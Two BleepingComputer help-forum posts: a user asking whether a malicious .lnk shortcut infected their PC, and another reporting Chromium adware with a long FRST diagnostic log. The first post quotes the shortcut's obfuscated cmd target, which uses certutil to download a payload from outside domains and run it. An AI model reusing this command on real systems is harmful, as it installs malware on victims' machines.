
.Lnk file with cmd usage - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer

Posted: 06 Jul 2020 11:33 AM PDT

Hi all,

Looking for feedback on the likelihood my double clicking of a bad .lnk file caused damage. When I did double click it, I remember getting a standard Windows dialog box. I believe it said the path did not exist or shortcut unavailable. I'm not finding anything in my startup folder for C:\programdata or my username appdata startup folder... I ran scans with Malwarebytes, Hitman with no results.

The .lnk file target was:

%ComSpec% /v:on/c(SET V4=/?8ih5Oe0vii2dJ179aaaacabbckbdbhhe=gulches_%PROCESSOR_ARCHITECTURE% !H!&SET H="%USERNAME%.exe"&SET V4adKK47=certutil -urlcache -f https://&IF NOT EXIST !H! (!V4adKK47!izub.fun!V4!||!V4adKK47!de.charineziv.com!V4!&!H!))>nul 2>&1

The .lnk file 'start-in' was:

"%APPDATA%\Mic…

Chromium Infection? - Virus, Trojan, Spyware, and Malware Removal Help - BleepingComputer


Posted: 29 Apr 2020 01:25 PM PDT

Recently, I started experiencing a slow computer and I noticed that I had a new icon on my desktop - Chromium. I looked it up and it appears to be malware. I ran my malware software, but it didn't appear to make any changes. I found a YouTube video showing me how to remove it, because it replicates so quickly. I thought I had it removed, but then it reappeared. Then one morning, I started the computer and the computer had created a new user profile. I'm still able to access my documents (which are backed up, but I don't know how that works with Chromium in the backup) on my old user profile, but I don't know how to undo it all.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-04-2020
Ran by JLO Squared (administrator) on OFFICE (Hewlett-Packard 550-047c) (29-04-2020 12:15:20)
Running from C:\Users\JLO Squared\Desktop\New folder
Loaded Profiles: JLO Squared (Available Profiles: JLO Squared)
Platform: Windows 10 Home Version 1903 18362.778 (X64) Language: English (United States)
Default browser: Chrome
Boot Mode: Safe Mode (with Networking)
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <11>
(Google LLC -> Google) C:\Users\JLO Squared\AppData\Local\Google\Chrome\User Data\SwReporter\81.233.200\software_reporter_tool.exe <4>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\HelpPane.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Users\JLO Squared\AppData\Local\Temp\TeamViewer\TeamViewer.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Users\JLO Squared\AppData\Local\Temp\TeamViewer\TeamViewer_Desktop.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8790264 2016-03-29] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [323056 2015-11-04] (Intel® Rapid Storage Technology -> Intel Corporation)
HKLM\...\Run: [AVGUI.exe] => C:\Program Files\AVG\Antivirus\AvLaunch.exe [156256 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [309560 2020-03-22] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [DBAgent] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1562304 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133216 2017-03-23] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM-x32\...\Run: [Dropbox] => C:\Program Files (x86)\Dropbox\Client\Dropbox.exe [6856192 2020-04-28] (Dropbox, Inc -> Dropbox, Inc.)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-03-18] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-03-18] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [Spotify] => C:\Users\JLO Squared\AppData\Roaming\Spotify\Spotify.exe [22907112 2020-04-02] (Spotify AB -> Spotify Ltd)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [Uploader] => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Seagate.Dashboard.Uploader.exe [142568 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [Chromium] => "c:\users\jlo squared\appdata\local\chromium\application\chrome.exe" --profile-directory="Default" --auto-launch-at-startup --restore-last-session
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [GoogleChromeAutoLaunch_A3B55F10413EDA3726B7768FB296E183] => "C:\Users\JLO Squared\AppData\Local\chromium\Application\chrome.exe" --no-startup-window /prefetch:5
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\Run: [com.squirrel.Teams.Teams] => C:\Users\JLO Squared\AppData\Local\Microsoft\Teams\Update.exe [2339472 2020-04-16] (Microsoft 3rd Party Application Component -> Microsoft Corporation)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\RunOnce: [Application Restart #0] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [4716280 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\RunOnce: [Application Restart #1] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [4716280 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\...\RunOnce: [Application Restart #2] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [506104 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.122\Installer\chrmstp.exe [2020-04-24] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F3F1B0FA-4775-41d8-8578-436772D93FB4}] -> C:\Program Files\Hewlett-Packard\SimplePass\OmniPassCredProv.dll [2015-01-30] (Softex Inc..) [File not signed]
HKLM\Software\...\Authentication\Credential Provider Filters: [{F3F1B0FA-4775-41d8-8578-436772D93FB4}] -> C:\Program Files\Hewlett-Packard\SimplePass\OmniPassCredProv.dll [2015-01-30] (Softex Inc..) [File not signed]
Startup: C:\Users\JLO Squared\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2016-05-14]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corporation -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {04EB000B-DE21-4843-AF0B-69AED103FA3E} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe
Task: {1080CFD3-9DD2-4EDA-9198-4818C769FF71} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616832 2019-09-04] (Apple Inc. -> Apple Inc.)
Task: {1E2C9A91-8CD4-40AB-AA5D-E5711BAD4FB9} - System32\Tasks\Microsoft\Windows\Shell\FamilySafetyUpload => {EBF00FCB-0769-4B81-9BEC-6C05514111AA}
Task: {1EAB813E-DF31-4B63-BCBD-6F2B048A0266} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {290745EA-588E-4075-B643-1882941CA2E7} - System32\Tasks\Start OPBHOBroker => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [506104 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
Task: {2942F40C-1C29-48E1-8571-0BE70D127DB9} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {34D03CA7-4765-4D2E-829A-CA7A40E905E3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {352E6CA0-7314-4DF4-89C4-682368D80D57} - System32\Tasks\Microsoft\Windows\Workplace Join\Automatic-Workplace-Join => C:\WINDOWS\System32\AutoWorkplace.exe
Task: {3C8C0DA7-492F-44B7-BEB4-9AB6DC7DC783} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [1506680 2019-06-14] (HP Inc. -> HP Inc.)
Task: {4EFF1458-0342-4BE0-8CB3-8834DE054C8A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [655736 2019-07-31] (HP Inc. -> HP Inc.)
Task: {542442B0-7956-40F5-8D0B-F23073818611} - System32\Tasks\AVG\Overseer => C:\Program Files\Common Files\AVG\Overseer\overseer.exe [1692296 2020-03-03] (AVG Technologies USA, LLC -> AVG Technologies)
Task: {55B902BB-CF5D-4306-B98A-4F8CFA12641C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [107848 2016-06-22] (Google Inc -> Google Inc.)
Task: {5A3FB241-0B11-4EA5-BC66-0D9F1B406040} - System32\Tasks\Microsoft\Windows\Customer Experience Improvement Program\BthSQM => {C8367320-6F85-11E0-A1F0-0800200C9A66} C:\WINDOWS\System32\BthTelemetry.dll [32256 2019-03-18] (Microsoft Windows -> Microsoft Corporation)
Task: {64AB27DF-D2A0-4AA2-BD46-887E347835E7} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
Task: {66B3A47C-8762-4AB7-811A-7138090D1480} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [134008 2020-03-25] (HP Inc. -> HP Inc.)
Task: {6DFCB649-0769-4F83-BB10-F60F235F6D3D} - System32\Tasks\Microsoft\Windows\SkyDrive\Idle Sync Maintenance Task => {BF6C1E47-86EC-4194-9CE5-13C15DCB2001}
Task: {7198E22B-CEB9-4D0A-AD2A-CB691BE5C71B} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [655736 2019-07-31] (HP Inc. -> HP Inc.)
Task: {7288D143-C5E3-4EAE-B930-94AF364C6852} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [25128 2017-11-21] (HP Inc. -> )
Task: {73D99E05-D666-4107-B0F4-98A30895BFAC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1117048 2020-03-26] (HP Inc. -> HP Inc.)
Task: {76547DEC-C475-411A-8FFE-C1224173C301} - \WPD\SqmUpload_S-1-5-21-3444092895-3226993445-944412456-1001 -> No File <==== ATTENTION
Task: {76936720-1AB0-4064-9C82-1049F01F3B49} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH57B3X08K => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1117048 2020-03-26] (HP Inc. -> HP Inc.)
Task: {789853A6-4F4D-4B54-84EB-5E26CCAB5068} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473-Logon => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [177376 2016-08-12] (Intel® Update Manager -> Intel Corporation)
Task: {7D3EAABF-0FFE-4F5D-86C5-13D1BCF650F9} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2020-04-02] (Dropbox, Inc -> Dropbox, Inc.)
Task: {7EAE0B06-258C-433B-91CB-047248998407} - System32\Tasks\HPCeeScheduleForJLO Squared => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [97848 2016-01-22] (Hewlett-Packard Company -> Hewlett-Packard)
Task: {8150B613-9E3A-4D5F-AC2E-554D34DA6A22} - System32\Tasks\Start SimplePass => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [4716280 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
Task: {872D0E53-FD2E-41E3-B431-698AF82882CE} - System32\Tasks\Microsoft\Windows\SkyDrive\Routine Maintenance Task => {1B1F472E-3221-4826-97DB-2C2324D389AE}
Task: {872D7360-4E45-4476-B8D1-92D95D848FBA} - System32\Tasks\McAfee\McAfee Auto Maintenance Task Agent => {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C}
Task: {874D3D52-8E42-4551-A6DF-477F2095B744} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [1117048 2020-03-26] (HP Inc. -> HP Inc.)
Task: {894DD150-CB69-4362-8C8E-16DFF065C8A2} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe [177376 2016-08-12] (Intel® Update Manager -> Intel Corporation)
Task: {8B58F41B-F714-4E10-944D-FD427D31E341} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1242704 2020-02-25] (Adobe Inc. -> Adobe Systems)
Task: {8B6B33FE-BBBA-41E7-B161-E6AFFAD5F42D} - System32\Tasks\Start OPBHOBrokerDesktop => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [506104 2015-01-30] (Softex Incorporated -> Hewlett-Packard)
Task: {8BF3A153-44BE-4E32-AFD0-57D3288033A2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {922DECAF-F7D8-4194-A153-2E31B3EBA240} - System32\Tasks\JLO Squared DBAgent 2 0 => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\DBAgent.exe [1562304 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
Task: {93675644-56A3-4872-A71D-D5B68E77D4AA} - System32\Tasks\Seagate_Install_Launch => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\Dashboard.exe [1952448 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
Task: {A6C2DFAC-DEEE-49C7-A940-D1B514495959} - System32\Tasks\Antivirus Emergency Update => C:\Program Files\AVG\Antivirus\AvEmUpdate.exe [3373072 2020-04-02] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
Task: {A78A2CA8-8F43-49E5-A1A7-F135FA25F253} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {AD258B33-53AA-49D7-93AF-6E24718E4116} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant printer driver installation => C:\WINDOWS\TEMP\EN7640_Full_WebPack_40.11.1135.exe <==== ATTENTION
Task: {BA235C0F-CA0F-430C-805B-5BF6ABE4B40B} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {BB5F56AD-07B7-42EF-9710-3A8D7795B9DA} - System32\Tasks\ChromiumUpdateTaskMachineUA => C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
Task: {CE1D642D-B242-4A06-B84E-9BABB025FDE3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [1506680 2019-06-14] (HP Inc. -> HP Inc.)
Task: {CE2DE968-E342-40D7-9566-427D45E4A886} - System32\Tasks\Microsoft\Windows\PerfTrack\BackgroundConfigSurveyor => {EA9155A3-8A39-40B4-8963-D3C761B18371}
Task: {CFA1461E-46C6-41D2-AA5A-44D1389498A2} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {D02335F3-868A-4259-ADEE-9D92D8E4AB83} - System32\Tasks\McAfee Remediation (Prepare) => C:\Program Files\Common Files\AV\McAfee Anti-Virus And Anti-Spyware\upgrade.exe [3271576 2015-11-03] (McAfee, Inc. -> McAfee, Inc.)
Task: {D1DD844A-D865-4B16-8B2A-02800E4F334C} - System32\Tasks\ChromiumUpdateTaskMachineCore => C:\Program Files (x86)\Chromium\Update\ChromiumUpdate.exe [100352 2020-03-03] (Chromium.) [File not signed] <==== ATTENTION
Task: {D22CEB41-71DA-439C-A35E-4E0AF6A5C423} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [107848 2016-06-22] (Google Inc -> Google Inc.)
Task: {D4E2A95B-6F2D-433D-A813-1627A4828B63} - \McAfee\McAfee Idle Detection Task -> No File <==== ATTENTION
Task: {D839EC74-CA2F-4086-9B89-F05CAAC1C332} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe
Task: {DAB6AD75-8836-46F6-BA70-99137A3C316D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [317816 2020-04-09] (HP Inc. -> HP Inc.)
Task: {E6AC8030-6DCF-494C-B829-5BCBF05036CE} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F2CA0649-90C5-4205-943F-C64793D36272} - System32\Tasks\HPCustParticipation HP ENVY 7640 series => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe [6438536 2017-05-23] (Hewlett Packard -> HP Inc.)
Task: {F4767EDD-7AFA-4F3C-A604-430266593549} - System32\Tasks\JLO Squared1 => C:\Program Files (x86)\Seagate\Seagate Dashboard 2.0\NBCore.exe [1812160 2017-09-16] (Seagate Technology LLC -> Seagate Technology LLC)
Task: {FB4C6965-BBA3-46E8-979F-059C8048C0D0} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {FF465B5F-F549-43DD-A587-1947168BA82E} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForJLO Squared.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{95b1e1fa-2052-49a6-b6e2-0f29f895036b}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=132277575682764249&GUID=AA233AE3-3D4A-43FE-8D7D-62586D1A0078
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=shnl&hsimp=yhs-001&type=c110428cc03d537d5ca738cb7b0&param1=IE&param2=1&param3=campaignID%3D661%26UserID%3D1455836809&param4=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
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=132277575682790558&GUID=AA233AE3-3D4A-43FE-8D7D-62586D1A0078
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=1&param3=campaignID%3D470%26UserID%3D1222810000&param4=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
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://hp13.msn.com
HKU\S-1-5-21-3444092895-3226993445-944412456-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=144&locale=ww_ww&pf=cndt&s=ieHPtab&tp=iehome
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=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&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=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&p={searchTerms}
SearchScopes: HKLM -> {99C2417D-5986-49E5-88A4-3ACE5730E4EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=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&p={searchTerms}
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=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&p={searchTerms}
SearchScopes: HKLM-x32 -> {99C2417D-5986-49E5-88A4-3ACE5730E4EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=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&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=shnl&hsimp=yhs-001&type=c110da2133e263350f22d84b4dc&param1=IE&param2=4&param3=campaignID%3D470%26UserID%3D1222810000&param4=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&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wsg_bjfpsso0w0_20_10_ssg00&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0A0F0CzytAzztAzzyD0ByD0CyEtB0FtN0D0Tzu0StBzyzzyEtN1L2XzuyEtFyCtCtN1L1Czu1ByCtN1L1G1B1V1N2Y1L1Qzu2StByBtDyByBzy0CtAtGtD0CyC0BtGzzyB0FzztGtBtBtC0DtGtDzy0FtBtD0ByE0AyB0D0B0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzyyCtCtBtD1TyB1QtG1P1S1S1OtGyEzyyCyBtGzzzy1RtBtGtDyB1Pzy1TtCtCyE1Q1TyByE2QtN0A0LzuyEtN1B2Z1V1T1S1NzutByDzytDyEtN1Q2Z1B1P1RzutCyDzztAtBzztAzzzztB%26cr%3D1969147934%26a%3Dwsg_bjfpsso0w0_20_10_ssg00%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKU\S-1-5-21-3444092895-3226993445-944412456-1001 -> {99C2417D-5986-49E5-88A4-3ACE5730E4EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-20] (Microsoft Corporation -> Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2017-10-27] (HP Inc. -> HP Inc.)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2020-03-09] (Evernote Corporation -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office16\GROOVEEX.DLL [2018-07-22] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2017-10-27] (HP Inc. -> HP Inc.)
Handler: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2019-06-12] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF HKLM-x32\...\Firefox\Extensions: [firefox@bho.com] - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt
FF Extension: (HP SimplePass) - C:\Program Files\Hewlett-Packard\SimplePass\FFBHOExt [2015-06-17] [Legacy] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF Plugin: @mcafee.com/MSC,version=10 -> C:\Program Files\mcafee\msc\npMcSnFFPl64.dll [No File]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
